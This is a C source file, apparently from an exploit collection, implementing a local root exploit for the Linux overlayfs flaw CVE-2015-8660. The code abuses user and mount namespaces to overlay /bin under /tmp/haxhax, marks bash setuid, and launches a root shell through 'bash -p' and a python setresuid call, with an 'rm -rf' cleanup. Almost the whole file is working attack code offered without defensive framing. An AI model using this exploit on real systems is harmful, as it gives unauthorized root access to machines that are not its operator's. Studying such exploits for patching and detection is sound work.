Path: blob/master/external/source/exploits/CVE-2015-8660/8660.c
#include <stdio.h>1#include <sched.h>2#include <stdlib.h>3#include <unistd.h>4#include <sched.h>5#include <sys/stat.h>6#include <sys/types.h>7#include <sys/mount.h>8#include <sys/types.h>9#include <signal.h>10#include <fcntl.h>11#include <string.h>12#include <linux/sched.h>13#include <sys/wait.h>1415static char child_stack[1024*1024];1617static int18child_exec(void *stuff)19{20system("rm -rf /tmp/haxhax");21mkdir("/tmp/haxhax", 0777);22mkdir("/tmp/haxhax/w", 0777);23mkdir("/tmp/haxhax/u",0777);24mkdir("/tmp/haxhax/o",0777);2526if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {27fprintf(stderr,"mount failed..\n");28}2930chmod("/tmp/haxhax/w/work",0777);31chdir("/tmp/haxhax/o");32chmod("bash",04755);33chdir("/");34umount("/tmp/haxhax/o");35return 0;36}3738int39main(int argc, char **argv)40{41int status;42pid_t wrapper, init;43int clone_flags = CLONE_NEWNS | SIGCHLD;44struct stat s;4546if((wrapper = fork()) == 0) {47if(unshare(CLONE_NEWUSER) != 0)48fprintf(stderr, "failed to create new user namespace\n");4950if((init = fork()) == 0) {51pid_t pid =52clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);53if(pid < 0) {54fprintf(stderr, "failed to create new mount namespace\n");55exit(-1);56}5758waitpid(pid, &status, 0);5960}6162waitpid(init, &status, 0);63return 0;64}6566usleep(300000);6768wait(NULL);6970stat("/tmp/haxhax/u/bash",&s);7172if(s.st_mode == 0x89ed)73execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);7475fprintf(stderr,"couldn't create suid :(\n");76return -1;77}787980